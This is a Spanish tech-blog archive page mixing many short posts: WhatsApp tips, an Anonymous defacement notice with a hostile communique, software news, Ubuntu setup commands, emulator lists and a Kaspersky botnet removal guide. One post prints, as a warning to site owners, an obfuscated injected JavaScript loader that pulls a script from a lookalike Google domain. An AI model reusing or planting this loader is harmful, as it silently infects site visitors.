[COMO] Usar 2 Whatsapp en el mismo telefono

 

WhatsApp es la aplicación líder entre las que se encargan de la mensajería, gracias en buena parte a la base de usuarios con la que cuenta el servicio, porque en funciones anda un poco desierta. Hace pocohemos visto llegar los documentos, pero los usuarios siguen pidiendo muchas funciones.

Una de esas funciones, que lleva siendo reclamada por los propios usuarios desde hace tiempo, es la de poder utilizar más de una cuenta de WhatsApp en el mismo dispositivo, más necesario aún teniendo dispositivos con hueco para dos tarjetas SIM. Aunque ya les costó lo suyo hacer un puente y construir WhatsApp Web, así que tampoco podemos esperar que la función vaya a llegar pronto.

No temáis, amigos androides: existen soluciones que os abrirán la posibilidad de utilizar dos cuentas de WhatsApp en el mismo móvil, como lo leéis. Si estáis interesados, ya sabéis lo que hacer: seguir leyendo.

El método sencillo: con WhatsApp Web

whatsappweb1

El primer truco se aprovecha mejor si utilizamos una tablet (o un teléfono con la pantalla muy grande), pero la gran ventaja es que podemos conseguirlo en cualquier dispositivo que ejecute un navegador actual. El truco es utilizar WhatsApp Web, el cual está más enfocado a los ordenadores, pero que es “usable” en las pantallas pequeñas.

Para hacerlo, debemos tener el móvil con la línea que queramos utilizar a mano, y el móvil donde queramos utilizar esa línea. Abrimos Chrome, forzamos que muestre la web de escritorio, y leemos el código con el primero. Incluso podemos recibir notificaciones gracias a Chrome, siempre que las activemos. Lo malo es que la web no se adapta a las pantallas pequeñas, por lo que es un poco incómodo usar este sistema de forma continuada; queda mejor en las tablets.

El método del sistema: perfiles de usuario

El sistema puede ser otro gran aliado para conseguir esta tarea, y todo estaría en el sistema de usuarios de Android. Cada aplicación tiene una memoria diferenciada por cada usuario, por lo que, cambiando de usuario, nos encontramos una versión de WhatsApp limpia, pudiendo meter otro número de teléfono sin mayores problemas.

El gran problema que genera esta solución es que, para cambiar entre cuentas de WhatsApp, necesitamos cambiar entre cuentas de usuario. En casos como un número de teléfono y otro número de trabajo, no supondrá un problema, pero en otros tantos sí puede serlo.

Hackeada la web AEDE

Comunicado Anonymous Aede

Lo contábamos esta mañana, la nueva Ley de Propiedad Intelectual ha sido finalmente aprobada en el Congreso. Entre sus principales novedades está el Canon AEDE, la compensación irrenunciable que los editores y creadores de contenidos recibirán vía asociación de gestión de derechos de autor.

En Xataka tenéis todos los detalles de esta ley, y aquí en Genbeta ya nos hemos hecho eco de algunas reacciones como la de Google, desde donde han asegurado que están muy decepcionados con la ley. La reacción de Anonymous tampoco se ha hecho esperar, y el colectivo ha hackeado la web de AEDE colgando un comunicado oficial.

A esta hora, este es el aspecto de la web de AEDE.

Anonymous Aede

El comunicado de Anonymous, el cual está escrito en un tono muy hostil y amenazante, reza lo siguiente:

Si pensáis, carteristas de la información, que con la aprobación del canon por parte de vuestros amigos del corrupto Partido Popular, vais a acabar con un Internet libre y al servicio de los ciudadanos, es que no nos conocéis.

Ni vosotros, ni vuestros medios vendidos al servicio de la corrupción institucionada, vais a conseguir acabar con una Red libre. Vuestros abugados y mercenarios de la porra intentarán protegeros de nosotros, pero nosotros somos una IDEA; no combatimos por un salario ni porque nos paguen unas putas como, seguramente, harán con vosotros.

Esperadnos.

Nunca estamos lejos de vuestros puertos, servidores, paneles de control y documentos (de los que ya hemos hecho una bonita copia).

La 9 de Anonymous.

Infectado por Go00ogle.net

Llevo tiempo intentando librarme de una infeccion en uno de mis servidores, Google Chrome y FireFox detectan la web como insegura y te bloquean el paso con la pantalla ROJA DE LA MUERTE , invitandote a no entrar, pues bien rebuscando rebuscando , he dado con el codigo malicioso injectado que es el siguiente:

function advQuery(){
var Host="http://google.com/";Track="/if.php";get=unescape("%6E%65%74");
document.write(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+get));
document.write(unescape(Track+"' type='text/javascript'%3E%3C/script%3E"));
};advQuery();

suele infectar archivos del tipo .js .php y .html , así que ya podéis revisar vuestros archivos

Plugins PhotoShop

Photo-Plugins via 1stwebdesigner.com

Mejora Contraste Local

local-contrast-enchancement

Foco Suave

soft-focus

Corrector de Lentes

lens-corrector

Mascara de Contraste

contrast-mask

contrast-mask-2

Gradiente Blur

.gradient-blur

B/W Conversion

bw-conversion

Sinedots II

sinedots

Shear

shear-phillip-plugin

Refinamiento Inteligente plug-in

smart-refinment-filter

Cybia

AlphaWorks – Efectos de Transparencia

alphaworks-transparency-effects

ColourWorks – Modificacion de Color

colourworks

Continuar leyendo “Plugins PhotoShop”

VirtualBox 2.2

 

 

 

 

Nueva version del software Virtualizador gratuito VirtualBox, los cambios son abundantes aqui teneis un resumen de la lista de cambios:
 

  • OVF (Open Virtualization Format) appliance import and export (see chapter 3.8, Importing and exporting virtual machines, User Manual page 55)
  • Host-only networking mode (see chapter 6.7, Host-only networking, User Manual page 88)
  • Hypervisor optimizations with significant performance gains for high context switching rates
  • Raised the memory limit for VMs on 64-bit hosts to 16GB
  • VT-x/AMD-V are enabled by default for newly created virtual machines
  • USB (OHCI & EHCI) is enabled by default for newly created virtual machines (Qt GUI only)
  • Experimental USB support for OpenSolaris hosts
  • Shared folders for Solaris and OpenSolaris guests
  • OpenGL 3D acceleration for Linux and Solaris guests (see chapter 4.8, Hardware 3D acceleration (OpenGL), User Manual page 70)
  • Added C API in addition to C++, Java, Python and Web Services 

Descargas:

  • VirtualBox 2.2.0 for Solaris and OpenSolaris hosts x86/amd64
  • VirtualBox 2.2.0 Software Developer Kit (SDK) All platforms (registration required)

Manual:

User Manual (version 2.2.0, updated 2009-04-08)

Sun corrige 15 vulnerabilidades en JRE 1.5,x y 6.x

La nueva versión 13 de la rama 6 de Java Runtime Environment corrige múltiples vulnerabilidades, como viene siendo habitual. El “Update 13”, como su propio nombre indica, es la decimotercera tanda de corrección de problemas de seguridad desde que apareció la rama 6 hace ahora dos años.

 

También se han corregido la rama 5 con el Update 18 y el JDK para desarrolladores. Los siete boletines publicados corrigen hasta 15 vulnerabilidades diferentes que podrían ser aprovechadas por un atacante remoto para escalar privilegios, provocar denegación de servicio y potencialmente, ejecutar código arbitrario.

 

Brevemente, las vulnerabilidades son:

 

  • Se ha corregido una vulnerabilidad en su implementación del servidor HTTP. Esto podría se aprovechado por un atacante remoto sin privilegios para causar una denegación de servicios a través de vectores no especificados.
  • * Se han corregido múltiples desbordamientos de memoria en JRE al procesar ficheros de imagen en formato PNG o GIF, así como ficheros de fuentes. Esto podría permitir a un atacante remoto escalar privilegios a través de applets o aplicaciones Java Web Start especialmente manipuladas
  • Se ha corregido un error en la máquina virtual de JRE, que podría permitir a un atacante remoto la ejecución de código arbitrario a través de applets especialmente manipulados.
  • * Se han corregido múltiples vulnerabilidades en Java Plug-in, podrían permitir a un atacante remoto escalar privilegios y obtener información sensible a través de applets especialmente manipulados.
  •  Se han corregido dos vulnerabilidades en JRE al procesar y almacenar ficheros fuentes de carácter temporal consumiendo gran cantidad de espacio en disco. Esto podría permitir a un atacante remoto provocar denegación de servicio a través de applets especialmente manipulados.
  • *Se ha corregido un error de desbordamiento de enteros y memoria en la utilidad de desempaquetado ‘unpack200’ de JRE. Esto podría ser aprovechado por un atacante remoto para escalar privilegios a través de applets especialmente manipulados.
  •  Se ha corregido un error en la implementación de LDAP, que podría permitir a un atacante remoto realizar denegación de servicio a través de la realización múltiples conexiones desde un cliente LDAP.

 

Las vulnerabilidades han sido solucionadas en JDK y JRE 6 Update 13 y JRE 5.x Update 18 desde:

http://www.java.com/es/download/

 

Continuar leyendo “Sun corrige 15 vulnerabilidades en JRE 1.5,x y 6.x”

Los 20 virus mas importantes de la Historia.

Esta lista no esta elaborada en funcion de la peligrosidad de los virus, sino en la importancia que tuvieron en un determinado momento en la Historia de la Informatica:

ELK CLONER (1985): el primer virus para ordenadores personales, concretamente para los sistemas Apple II. Creado por un estudiante, el virus infectaba el sistema operativo, se copiaba en los discos flexibles y desplegaba uno o dos versos de un poema. El virus no tuvo mucha notoriedad ni provocó grandes preocupaciones, sin embargo, pocos se dieron cuenta de que iniciaría una generación de ciber criminales y, en paralelo, una industria de seguridad de la información.

INTERNET WORM (1985): escrito por una persona de la Universidad Cornell que paralizó Internet.

PAKISTANI BRAIN (1988): el primer virus que infectó el PC de IBM y fue escrito por dos hermanos de Pakistán. Este fue el primer virus que recibió amplia cobertura de los medios, aunque los virus ya se conocían en la ciencia ficción.

JERUSALEM FAMILY (1990): se contabilizaron casi cincuenta variables de este virus, que se cree salió de la Universidad de Jerusalén.

STONED (1989): es el virus que más se propagó en la primera década de los virus. Stoned infectaba el sector de arranque/.mbr que contaba el número de reinicios desde la infección original y mostraba la frase “your computer is now stoned”.

DARK AVENGER MUTATION ENGINE (1990): fue escrito en 1988, pero se utilizó a principios de los noventa en virus como POGUE y COFFEESHOP. Este Motor de Mutación fue el primer Polimorfo real que se usó a nivel masivo y cambió para siempre la forma en que funcionan los virus.

MICHEANGELO (1992): una variante de STONED, con una carga destructiva. El 6 de marzo, este virus borró los primeros 100 sectores de un disco duro, dejándolo inútil. Provocó uno de los primeros pánicos mediáticos alrededor de los virus de equipos informáticos.

WORLD CONCEPT (1995): el primer macro virus para Microsoft Word. Word Concept escribía la frase, “That’s enough to prove my point”. Inició la segunda era de los virus y fue importante en el sentido de que llevó los virus a un nivel de hackers mucho menos avanzado.

CIH/CHERNOBYL (1998): El virus Chernobyl fue el virus más destructivo jamás visto, hasta entonces. Atacando los días 26 de cada mes (dependiendo de la versión involucrada), borraba el disco duro, y eliminaba el flash ROM BIOS de la computadora en cuestión.

MELISSA (1999): es el primer virus que se propagó vía correo electrónico y realmente marcó el inicio de la era de los virus de Internet. El devastador virus Melissa combinó virus y gusanos para propagarse e infectar a millones de usuarios. Si bien Melissa no fue destructivo, sí se replicaba y saturaba los buzones de correo a dondequiera que llegaba.

LOVEBUG (2001): es el gusano para correo electrónico más popular, motivado únicamente por la ingeniería social. Es un excelente ejemplo de esta técnica, que invitaba a las víctimas a abrir el archivo adjunto con la promesa de una carta de amor. El virus se propagó rápidamente por todo el mundo, provocando fallos en el correo electrónico y pérdidas a las compañías por varios miles de millones de dólares.

Code RED (2001): bautizado con el nombre de un popular refresco, este virus de red se propagaba sin necesidad de un correo electrónico o una página web. Localizaba ordenadores vulnerables y los infectaba por sí mismo. Infectó casi 400.000 páginas web.
Continuar leyendo “Los 20 virus mas importantes de la Historia.”

AntiCrash adios a los Pantallazos Azules.

Soy muy esceptico respecto a las utilidades milagrosas, pero tengo que reconocer que esta me ha sorprendido, tenia un fallo en un cliente con cuelgues en win32k.sys al instalar una actualización de Java desde el navegador Avant (mod de IExplorer), y se colgaba, pues ha sido instalar esta utilidad y mano de santo, adiós al pantallazo y me permite finalizar la instalacion de la actualización.

En su pagina web hablan de que solucionan el 95,8 % de los cuelgues y pantallazos (creo que se han flipado) pero la verdad es que vale la pena probarlo e incluso comprarlo.

AntiCrash 3.6.1 Download [1.71Mb]
Battery Doubler 1.2.1 Download [1.34Mb]
Hare 1.5.1 Download [1.41Mb]
Zoom 1.3.1 Download [1.34Mb]
Juggle Mouse 1.2.1 Download [1.14Mb]

NoEstudiesInformatica.com

Se ha creado la web NOESTUDIESINFORMATICA.COM dado la escasa repercusion que ha tenido la huelga que hemos secundado los Informaticos de este pais, nuestro unico consuelo es aconsejar a la gente que duda que estudiar y es una apasionada de la informatica QUE ESTUDIE CUALQUIER OTRA COSA .

os recomiendo su lectura para conocer la problematica actual, aqui os pongo la conclusion

Continuar leyendo “NoEstudiesInformatica.com”

Luis Royo y su Ilustracion, Books

Luis Royo

Luis RoyoLuis Royo (Olalla, Teruel, 1954) artista español que destaca por sus ilustraciones erótico-fantásticas, ya sea con tintes mecánicos o más épicos, por decirlo de algún modo. Por otra parte también cuenta con ilustraciones futuristas, de ciencia ficción, o fantastico-épicas sin necesidad de una connotación erótica o sexual.

Además de sus obras independientes, ha colaborado con el diseño de videojuegos, álbums como por ejemplo El ángel caído, de Avalanch, y también como caratulas de discos de grupos de gothic-black metal como Graveworm, portadas de tebeos, carátulas de juegos de ordenador como tZar y cartas de tarot.

Especialmente famosas son sus ilustraciones de Julie Strain (actriz), para las portadas de la película animada Heavy Metal’.

Web-site: www.luisroyo.com.


Dome
Dome (by Luis and Romulo Royo)
Dark Labyrinth
Dark Labyrinth
Subversive Beauty
Subversive Beauty
Fantastic Art
Fantastic Art
Evolution
Evolution
Dreams
Dreams

via: Dana Mad

50 ejemplos de portafolios de diseñadores

Via Smashing Magazine aqui teneis una recopilacion de 50 diseños de portafolios de profesionales del sector.

Pikaboo

Lyndon Wade

Jesse Willmon’s fall 2008 DESIGN-TACULAR

Daniel Stenberg

Domenico Tedone Design

Marc Dahmen
Continuar leyendo “50 ejemplos de portafolios de diseñadores”

Ubuntu 8.10 Intrepid Ibex: Y ahora que?

Via: TuxApuntes.com

* Instalar software mas rapidamente.

Suele ocurrir (y especialmente) cuando sale una nueva version de Ubuntu, que los repositorios desde los cuales nos solemos descargar software estan muy saturados. Si queremos descargar e instalar el software mas rapidamente, tendremos que modificar la lista de repositorios.

Existe una opcion de Synaptic, que nos permite seleccionar un servidor mas cercano a nuestra region. Para cambiar este servidor a uno mas cercano vamos a Sistema > Administracion > Origenes de software y en la pestaña “Software de Ubuntu”, seleccionamos “descargar desde:” indicando la region mas cercanaa la nuestra.

* Instalar el software basico de compilacion

Si queremos compilar algun paquete del que solo tenemos el codigo fuente, tendremos que instalar los paquetes
basicos de compilacion. Lo instalamos con:

sudo aptitude install build-essential

* Instalar los extra restrictivos.

Hay ciertos paquetes que no vienen por defecto en Ubuntu por cuestiones legales. Cuando se instala ubuntu, por defecto y debido a un tema de licencias no instala todo ese software comercial que no ha liberado el codigo fuente, como por ejemplo puede ser el plugin de flash, o los codecs para poder reproducir algunos formatos de video. Existe un metapaquete (un paquete que agrupa e instala muchos mas paquetes) llamado ubuntu-restricted-extras que nos permiteinstalar todo este software que no es instalado por defecto.

Tras habilitar los repositorios universe y multiverse podemos instalar este metapaquete con:

sudo apt-get install ubuntu-restricted-extras

* Otra opcion es añadir el repositorio mediubuntu para Intrepid Ibe

Mediubuntu es un repositorio donde podemos encontrar algunas aplicaciones y codecs que no son instalador por defecto. Podemos añadirlo a la lista de repositorios ejecutando, desde una terminal:

sudo wget http://www.medibuntu.org/sources.list.d/intrepid.list -O /etc/apt/sources.list.d/medibuntu.list

y despues

sudo apt-get update && sudo apt-get install medibuntu-keyring && sudo apt-get update

* Instalamos Codecs Multimedia

sudo apt-get install libdvdcss2

Segun nuestra plataforma, instalamos CODECS:

* For i386, the package is called w32codecs:

sudo apt-get install w32codecs

* For amd64, the package is called w64codecs:

sudo apt-get install w64codecs

* For ppc, the package is called ppc-codecs:

sudo apt-get install ppc-codecs

* Instalar codecs multimedia para GStreamer
Lo vimos antes, pero si queremos instalar codecs para reproducir la mayoria de formatos de audio y video solo para Gstreamer, ejecutamos:

sudo apt-get install faad gstreamer0.10-ffmpeg gstreamer0.10-plugins-bad gstreamer0.10-plugins-bad-multiverse gstreamer0.10-plugins-ugly gstreamer0.10-plugins-ugly-multiverse gstreamer0.10-pitfdll liblame0

* Instalar Avant Window Navigator
AWN es un dock similar al de Mac, que nos permite lanzar aplicaciones desde una barra con iconos que se instala en nuestro escritorio. Para instalar AWN no necesitamos añadir repositorios adicionales, dado que se encuentra en los repositorios de nuestro sistema.

sudo apt-get install awn-manager-trunk awn-extras-applets-trunk

una vez instalado accedemos al programa desde Aplicaciones > Accesorios > Avant Window Navigator podemos cambiar sus preferencias desde Sistema > Preferencias > Awn manager

para tener un dock similar al de Mac, puedes bajarte este tema para Awn:

http://rapidshare.com/files/71511920/Transparent.tgz.html

* Instalar OpenOffice.org 3.0

Lo primero que tendremos que hacer es añadir el repositorio correspondiente a sources.list yendo a Sistema -> Administración -> Orígenes de software -> Software de terceros -> Añadir, e introduciendo la línea

deb http://ppa.launchpad.net/openoffice-pkgs/ubuntu intrepid main

Pulsamos Cerrar y se nos preguntará si queremos actualizar la lista de los paquetes disponibles. Pulsamos sobre el botón Recargar y esperamos a que se termine de actualizar la lista.

Una vez hecho esto el sistema detectará que existe una versión más actual de OpenOffice.org (la 3.0) disponible en el repositorio que acabamos de añadir, y se mostrará el icono de Actualizaciones en la barra de tareas. Hacemos clic sobre el icono y seleccionamos “Instalar actualizaciones”.

* Instalar Mplayer con todos los codecs y soporte de DVD

Si queremos reproducir peliculas con Mplayer ejecutamos:

sudo apt-get install mplayer

Si hemos instalado los ubuntu restricted extra, seguramente ya tengamos muchos de estos paquetes instalados.

* Instalar Sun Java Runtime Environment

Si queremos instalar java para poder ejecutar aplicaciones basadas en Java o tener el plugin de Java para el navegador,
ejecutamos:

sudo apt-get install sun-java6-fonts sun-java6-jre sun-java6-plugin

* Instalar Flash Player Plugin

Si queremos por ejemplo ver esos videos de Youtube desde firefox, tendremos que instalar el plugin de Flash, que nos permitira ver esos videos desde el navegador que estemos usando:

Para instalar el plugin oficial ejecutamos:

sudo apt-get install flashplugin-nonfree libflashsupport

Si en cambio queremos instalar el Open Source:

sudo apt-get install mozilla-plugin-gnash

Continuar leyendo “Ubuntu 8.10 Intrepid Ibex: Y ahora que?”

Broken Sword I : La leyenda de los templarios

Sigo con mi recopilación personal de aventuras graficas que marcaron mi infancia, y ahora disfruto en mi pda gracias al ScummVM , esta vez se trata de Broken Sword : La leyenda de los templarios

Fecha de salida / compañía:

1996 por Virgin Interactive Entertaiment.

Trama:

Las inocentes vacaciones del turista americano George Stobbart se ven alteradas debido a una explosión en un café de París. Como testigo, pero sin pruebas, decide emprender la búsqueda del asesino junto a la periodista Nicole Collard. Pronto se darán cuenta de que existe una profunda conexión entre el atentado y los legendarios Caballeros Templarios. Su aventura transcurrirá por Siria, Escocia, España, Irlanda y París.

Versiones:

El juego apareció en PC, PlayStation y GameBoy Advance.


Descarga: Broken Sword

30 Turoriales para The Gimp

De la mano de Noupe aqui teneis 30 tutoriales para sacarle todo el provecho a la nueva edición del software libre de retoque fotografico por excelencia The Gimp

GIMP 2.6 Released!

1. Neon Lights Tutorial

2. Recoloring Eyes

3. Lineart Tutorial

4. Easy Sig

5. A colored swirl of light

6. Create a nice oilpainting from a photo

7. Making a pencil drawing from a photo

8. Gimp Sin City Tutorial

Continuar leyendo “30 Turoriales para The Gimp”

Time Invaders el regreso de los clasicos

Via www.talfi.net

SOBRE TIMEINVADERS:
TimeInvaders es un grupo de desarrollo de videojuegos independientes que vivieron la época de los videojuegos de 8 bits, e intentan recuperar la magia de estos juegos para las nuevas generaciones.

El equipo de desarrollo está formado por un grupo de profesionales, músicos, grafistas y programadores. Este último desarrollo surge como homenaje del 30 aniversario del juego Space Invaders, que tanto marco a más de una generación. Y por supuesto, este juego se ofrece de forma 100% gratuita, con el que esperamos que tanto los que ya han jugado, como aquellos que aún no lo han hecho, disfruten de muchas horas de juego

ARGUMENTO:
The Attack of Mutant Fruits from Outer Space, es un matamarcianos inspirado al estilo de los clásicos, ambientado en diferentes planetas de una galaxia exterior. Las frutas mutantes son una nueva especie, una amezada creada por los seres humanos, en un intento de salvar los recursos naturales del planeta. Aunque fueron cultivadas en otros mundos las semillas ya estaban contaminadas. Ahora son seres inteligentes y destructivos e intentar aniquilar a todos los mundos que encuentran a su paso mientras se dirigen a la Tierra.

Subete a tu caza estelar e intenta defender la galaxia de esta amenaza.


CARACTERISTICAS DEL JUEGO:

– Disponible para plataformas Windows
– Ranking de puntuación en la web. El jugador puede subir su highscore a la web.
– 10 mundos diferentes.
– 8 melodías originales.
– 12 enemigos.
– 3 tipos de armas y un escudo laser.
– Vidas extra.
– Soporte para teclado y joystick. El teclado es totalmente configurable.
(Fácil configuración para equipos arcade, por ejemplo, X-ARCADE … )
– Manuales a todo color en inglés y español.

DESCARGAS:
http://www.timeinvaders.com/downloads/mutantfruits.exe
http://www.timeinvaders.com/downloads/MF_manual_es.pdf
http://www.timeinvaders.com/downloads/MF_manual_en.pdf

CAPTURAS DE PANTALLAS:

RANKING DE JUGADORES EN INTERNET:
http://www.timeinvaders.com/hiscore.php

WEBSITE:
http://www.timeinvaders.com

Emuladores para PDA y SmartPhone

Hace unos dias he cambiado mi Palm Treo 750v , de la cual solo puedo hablar maravillas por mi nueva y flamante HTC Diamond, la verdad estoy contento con el cambio pero echo de menos el teclado fisico, mi otra opcion era esperarme a la Treo 800w que saldra dentro de poco pero las caracteristicas son muy inferiores a la Diamond, he empezado a ponerle cositas al bicho, usando como siempre las web de referencia HTCMania Vagos PDA y por supuesto PDA Expertos de la cual os copio y pego esta lista de emuladores para nuestros dispositivos portatiles.

Actualizacion: Emulador Mame y Caprice32 PocketCult

EMULADORES PDA

Emulador de NES,SNES,GB,GBC,Genesis
gratuito.

icon_arrow.gif Little John PalmOs

____________________________________________________
1. Emulador de NES
2. Emulador de TG16
3. Emulador de SEGA Game Gear/Master System
4. Emulador de GB,GB
COLOR
es de pago.

1. icon_arrow.gif Nesem
2. icon_arrow.gif Dream Engine
3. icon_arrow.gif Gizmo Ultra
4. icon_arrow.gif Gbulator

____________________________________________________
1. Emulador de Génesis, Atari 2600, MS, GG y TG16/PCEngine
2. Emulador de Mame32
3. Emulador de BoR/Palm

gratuito, es de pago

1. icon_arrow.gif GuineaPig
2. icon_arrow.gif Xcade
3. icon_arrow.gif B.o.R
4. icon_arrow.gif B.o.R – Tutorial

____________________________________________________
Emulador de Aventuras Gráficas Lucas Art
gratuito.

icon_arrow.gif ScummVM
icon_arrow.gif ScummVM – Tutorial1
icon_arrow.gif ScummVM – Tutorial2

____________________________________________________
Emulador de GB,GBC,GBA
es de pago.

icon_arrow.gif Firestorm

____________________________________________________
Quake, Doom, Hexen, Heretic
gratuito.

icon_arrow.gif Zquake
icon_arrow.gif Zdoomz
icon_arrow.gif ZHexen
icon_arrow.gif ZHeretic
icon_arrow.gif Zquake,Zdoom,Zhexen – Tutorial por: Hockino72

____________________________________________________
Duke3d
gratuito.

icon_arrow.gif Duke3d
icon_arrow.gif Duke3d – Tutorial

____________________________________________________
Emulador M.A.M.E.
gratuito.

icon_arrow.gif PalmM.A.M.E.
icon_arrow.gif PalmM.A.M.E. – Tutorial por: palmerouy

____________________________________________________
FlashBack
gratuito.

icon_arrow.gif FlashBack
icon_arrow.gif FlashBack – Tutorial

Google Chrome el nuevo Navegador de Google

Para Windows Vista/XP

Un cuadro para todo
Escribe en la barra de direcciones y obtén sugerencias para búsquedas y páginas web.

Miniaturas de las páginas más visitadas
Accede a tus páginas favoritas a gran velocidad desde una pestaña nueva.

Accesos directos para tus aplicaciones
Obtén accesos directos en el escritorio para iniciar tus aplicaciones web favoritas.

Google Chrome

Funciones

El diseño minimalista del navegador Google Chrome permite un uso más rápido, fácil y seguro de la Web. Descubre por qué hemos creado un navegador.

Búsqueda web, historial web, barra de direcciones y sugerencias de escritura: todas estas funciones de navegación están disponibles en un mismo cuadro. Más información.

Cada vez que abras una pestaña nueva se mostrará un resumen visual de los sitios web más visitados, los motores de búsqueda más utilizados, las últimas pestañas que has cerrado y las últimas páginas que has guardado como marcador. Más información.

Utiliza aplicaciones web sin necesidad de abrir el navegador. Los accesos directos de las aplicaciones te permiten pueden iniciar tus aplicaciones online favoritas. Más información.

Crea ventanas nuevas a partir de las pestañas del navegador simplemente arrastrándolas, agrupa varias pestañas en una única ventana y organízalas según te interese. Todo de forma muy fácil y rápida. Más información.

Cada pestaña es independiente, de modo que si una aplicación falla, el resto de las pestañas no se verán afectadas. Más información.

¿Quieres que las páginas que visitas no aparezcan en el historial web? Elige el modo incógnito para navegar de forma privada. Más información.

Google Chrome te advierte si estás a punto de visitar un sitio web inseguro que pueda alojar software malintencionado o prácticas de phishing. Más información.

¿Quieres guardar una página web como marcador? Tan solo tienes que hacer clic en el icono en forma de estrella situado a la izquierda de la barra de direcciones. Más información.

Con Google Chrome puedes seguir utilizando los mismos marcadores y contraseñas del navegador que utilizabas hasta el momento. Más información.

Olvídate de los intrusivos administradores de descargas. Con Google Chrome verás el estado de la descarga en la parte inferior de la ventana. Más información.

Más información

La historia detrás de Google Chrome

En este vídeo, el equipo de desarrollo te muestra cómo ideó Google Chrome y todas sus funciones.

Ver el video

Descubre la tecnología del navegador

El escritor Scott McCloud te muestra en su interpretación en forma de cómic las decisiones técnicas más importantes.

Leer el libro (en inglés)


Descargar Google Chrome

Seguimiento de huracanes en tiempo Real

Gracias a la web de podemos hacer un seguimiento en tiempo real del los fenomenos metereologicos del Atlantico, en este caso se hace un seguimiento del Huracan Gustav que esta asolando el Caribe y la costa oeste de Estados Unidos, usa la tecnologia de Google Maps

Como saber si tu ordenador es un ZOMBIE

El conocido laboratorio Kaskersky Lab ha publicado (en ingles) un articulo para saber si nuestros ordenadores pertenecen a la red Zombie de mas de 1.000.000 ordenadores que estan infectados sin saberlo, siguiendo el manual podemos desinfectar nuestro sistema:

Artículo Español

Artículo Ingles

Instrucciones para la localización y eliminación de software malintencionado de Sombra bot.

Instructions prepared by: Vitaly Kamluk, Kaspersky Lab Instrucciones preparado por: Vitaly Kamluk, Kaspersky Lab
Date: 06.08.2008 Fecha: 06.08.2008
MD5 of analyzed sample: 9e2ef49e84bc16c95b8fe21f4c0fe41e MD5 de la muestra analizada: 9e2ef49e84bc16c95b8fe21f4c0fe41e

Locating malware (with security software) Acceso a los programas maliciosos (con software de seguridad)

Kaspersky Anti-Virus has been able to detect malware which supports the Shadow botnet since 30th of January 2008. Kaspersky Anti-Virus ha sido capaz de detectar malware que apoya la Sombra botnet desde el 30 de enero de 2008. Detection names may vary from version to version. Detección de nombres pueden variar de versión a versión. The malware is detected under the following names: El programa malicioso se detecta con los siguientes nombres:

  • Backdoor.Win32.IRCBot.bit
  • Backdoor.Win32.IRCBot.biy
  • Backdoor.Win32.IRCBot.bjd
  • Backdoor.Win32.IRCBot.bjh
  • Backdoor.Win32.IRCBot.cja
  • Backdoor.Win32.IRCBot.cjj
  • Backdoor.Win32.IRCBot.ckq
  • Backdoor.Win32.IRCBot.cow
  • Backdoor.Win32.IRCBot.czt
  • Backdoor.Win32.IRCBot.ekz
  • Rootkit.Win32.Agent.aet
  • Trojan-Downloader.Win32.Injecter.pj
  • Trojan.Win32.DNSChanger.azo
  • Trojan.Win32.DNSChanger.bao
  • Trojan.Win32.DNSChanger.bck
  • Trojan.Win32.DNSChanger.bfo
  • Trojan.Win32.DNSChanger.bjh
  • Trojan.Win32.DNSChanger.bji
  • Trojan.Win32.DNSChanger.bjj
  • Trojan.Win32.DNSChanger.bmj
  • Trojan.Win32.DNSChanger.bnw
  • Trojan.Win32.DNSChanger.bqk
  • Trojan.Win32.DNSChanger.bsm
  • Trojan.Win32.DNSChanger.buu
  • Trojan.Win32.DNSChanger.bwi
  • Trojan.Win32.DNSChanger.bxd
  • Trojan.Win32.DNSChanger.bxe
  • Trojan.Win32.DNSChanger.bxv
  • Trojan.Win32.DNSChanger.cap
  • Trojan.Win32.DNSChanger.ccg
  • Trojan.Win32.DNSChanger.cei
  • Trojan.Win32.DNSChanger.cem
  • Trojan.Win32.DNSChanger.eag
  • Trojan.Win32.DNSChanger.gvb
  • Trojan.Win32.Restarter.e
  • Trojan.Win32.Restarter.f
  • Trojan.Win32.Restarter.g
  • Trojan.Win32.Restarter.h

The current sample was detected on 6th August 2008 as Trojan.Win32.DNSChanger.gvb La actual muestra se detectó el 6 de Agosto 2008 como Trojan.Win32.DNSChanger.gvb

Locating malware (manually) Acceso a los programas maliciosos (manualmente)

As the bot doesn’t copy its body to the system, the name of the malicious file can vary. A medida que el robot no copiar su cuerpo al sistema, el nombre del archivo malicioso puede variar. The name of the malicious file depends on the installer used to infect the system with the bot. El nombre del fichero dañino depende de que el instalador utilizado para infectar el sistema con el bot. However, it is possible to detect the presence of the bot by checking the system registry. Sin embargo, es posible detectar la presencia del bot de control el registro del sistema.

Users can check the system registry by running regedit.exe and checking the following registry value: Los usuarios pueden comprobar el registro del sistema ejecutando regedit.exe y comprobar la siguiente valor del registro:

HKEY_CLASSES_ROOT\.htc\Content Type HKEY_CLASSES_ROOT \. HTC \ Tipo de Contenido

System administrators of large networks can do this remotely using the reg.exe command as shown below: Los administradores de sistemas de grandes redes puede hacer esto forma remota utilizando el comando reg.exe como se indica a continuación:

The default system registry value (checked on Windows XP Pro SP2) for HKEY_CLASSES_ROOT\.htc\Content Type is “text/x-component”. El sistema por defecto el valor de registro (comprobado en Windows XP Pro SP2) para HKEY_CLASSES_ROOT \. HTC \ tipo de contenido es “text / x-componente”. If there is a different value such as “{space}” in the registry, this may mean the machine is infected with Shadow bot malware. Si hay un valor diferente, como “espacio ()” en el registro, esto puede significar que la máquina está infectada con malware Shadow bot.

Continuar leyendo “Como saber si tu ordenador es un ZOMBIE”

30 Fuentes Gratuitas Grounge

Fusty Saddle

Petie Boy

Heroin 07

Inked God

Killed DJ

Good Luck For You

Continuar leyendo “30 Fuentes Gratuitas Grounge”